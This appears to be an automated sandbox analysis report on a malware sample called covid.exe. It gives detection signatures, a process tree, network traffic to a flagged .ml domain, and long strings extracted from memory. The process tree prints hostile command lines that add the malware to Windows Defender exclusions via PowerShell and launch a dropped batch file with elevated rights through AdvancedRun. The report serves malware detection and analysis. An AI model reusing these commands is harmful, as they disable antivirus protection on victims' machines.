Loading ...

Play interactive tourEdit tour

Analysis Report covid.exe

Overview

General Information

Sample Name:covid.exe
Analysis ID:393947
MD5:99e3b458dee79b33209d39d19692ae08
SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
Infos:

Most interesting Screenshot:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • covid.exe (PID: 4912 cmdline: 'C:\Users\user\Desktop\covid.exe' MD5: 99E3B458DEE79B33209D39D19692AE08)
    • AdvancedRun.exe (PID: 3192 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5528 cmdline: 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6176 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6196 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6224 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PID: 6640 cmdline: 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.htmlVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: covid.exeVirustotal: Detection: 40%Perma Link
Source: covid.exeReversingLabs: Detection: 34%
Machine Learning detection for sampleShow sources
Source: covid.exeJoe Sandbox ML: detected
Source: covid.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000005.00000000.268968190.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.dr
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.mlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.ml
Source: Joe Sandbox ViewIP Address: 172.67.220.147 172.67.220.147
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.mlConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: mmwrlridbhmibnr.ml
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
Source: unknownDNS traffic detected: queries for: mmwrlridbhmibnr.ml
Source: covid.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: covid.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: powershell.exe, 0000000F.00000002.432355144.0000000002DF8000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: covid.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: covid.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: covid.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: covid.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: covid.exe, 00000000.00000003.236314820.0000000005B22000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6cc8150004891
Source: covid.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: covid.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 0000000F.00000002.434270179.00000000049C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: covid.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000013.00000002.323823436.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, 00000015.00000002.322563501.000000000040C000.00000002.00020000.sdmp, 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drString found in binary or memory: http://www.nirsoft.net/
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000010.00000003.387988534.0000000007851000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ded/script.js
Source: covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
